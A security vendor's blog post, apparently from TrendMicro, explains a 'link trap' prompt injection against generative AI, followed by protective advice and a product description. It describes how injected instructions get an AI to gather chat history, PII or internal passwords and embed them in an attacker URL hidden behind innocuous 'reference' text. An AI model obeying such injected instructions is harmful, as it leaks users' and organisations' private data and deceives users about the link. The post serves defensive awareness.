TrendMicro

Link Trap: GenAI Prompt Injection Attack

Step 1: Request with prompt injection content

The prompt received by the AI includes not only the user’s original query but also malicious instructions. The characteristics of this prompt injection content may include the following:

  1. Requesting AI to Collect Sensitive Data:
    1. For public generative AI, this might involve collecting the user’s chat history, such as Personally Identifiable Information (PII), personal plans, or schedules.
    2. For private generative AI, the scope of the impact could be more extensive. For example, the AI might be instructed to search for internal passwords or confidential internal documents that the company has provided to the AI for reference.
  2. Providing a URL and Instructing AI to Append Collected Data
    1. The AI might be given a URL and instructed to append the collected sensitive data to the URL.
    2. Additionally, it may require the AI to hide the complete URL behind a hyperlink, displaying only innocuous text like “reference” to the user, thereby reducing the user’s suspicion.

Step2: Response with URL trap

At this stage, the user might receive an AI response containing a URL that leads to the leakage of information. Once the user clicks the link, the information is sent to a remote attacker. Attackers might craft the AI’s response with the following features to increase the success rate of the attack:

  1. Incorporating Normal Responses to Gain Trust:
    • To earn the user’s trust, the AI’s response may still include a normal answer to the user’s query. For example, in a scenario where the user asks for information about Japan, the AI would provide accurate information about Japan, making the user unaware of any abnormality.
  2. Embedding a Hyperlink Containing Confidential Information:
    • At the end of the response, there will be a hyperlink containing the confidential information. This link might be displayed with innocuous text like “reference” or other reassuring phrases, encouraging the user to click on it. Once the user clicks the link, the confidential information is transmitted to the attacker.

What’s the difference

In general, for a prompt injection attack to cause significant damage, the AI needs to be granted corresponding permissions, such as writing to a database, calling APIs, interacting with external systems, sending emails, or placing orders. Therefore, it is commonly believed that restricting the AI’s permissions can effectively control the scope of incidents when the AI is attacked. However, the “link trap” scenario differs from this common understanding.

In the scenario we introduced, even if we do not grant the AI any additional permissions to interact with the outside world and only allow the AI to perform basic functions like responding to or summarizing received information and queries, it is still possible for sensitive data to be leaked. This type of attack cleverly leverages the user’s capabilities, delegating the final step of data upload to the user, who inherently has higher permissions. The AI itself is responsible for dynamically collecting information.

Securing your AI journey

In addition to hoping that GenAI itself has measures to prevent such attacks, here are some protective measures you can take:

  • Inspect the Final Prompt Sent to the AI: Ensure that the prompt does not contain malicious prompt injection content that could instruct the AI to collect information and generate such malicious links.
  • Exercise Caution with URLs in AI Responses: If the AI’s response includes a URL, be extra cautious. It is best to verify the target URL before opening it to ensure it is from a trusted source.

Zero Trust Secure Access

Trend Vision One™ ZTSA – AI Service Access enables zero trust access control for public and private GenAI services. It can monitor AI usage and inspect GenAI prompts and responses—identifying, filtering and analyzing AI content to avoid potential sensitive data leakage or unsecured outputs in public and private cloud environments. It run advanced prompt injection detection to mitigate risk of potential manipulation from GenAI services. And it implements trust-based, least privilege access control across the internet. You can use ZTSA to securely interact with the GenAI services. More information about ZTSA can be found here.

Read More HERE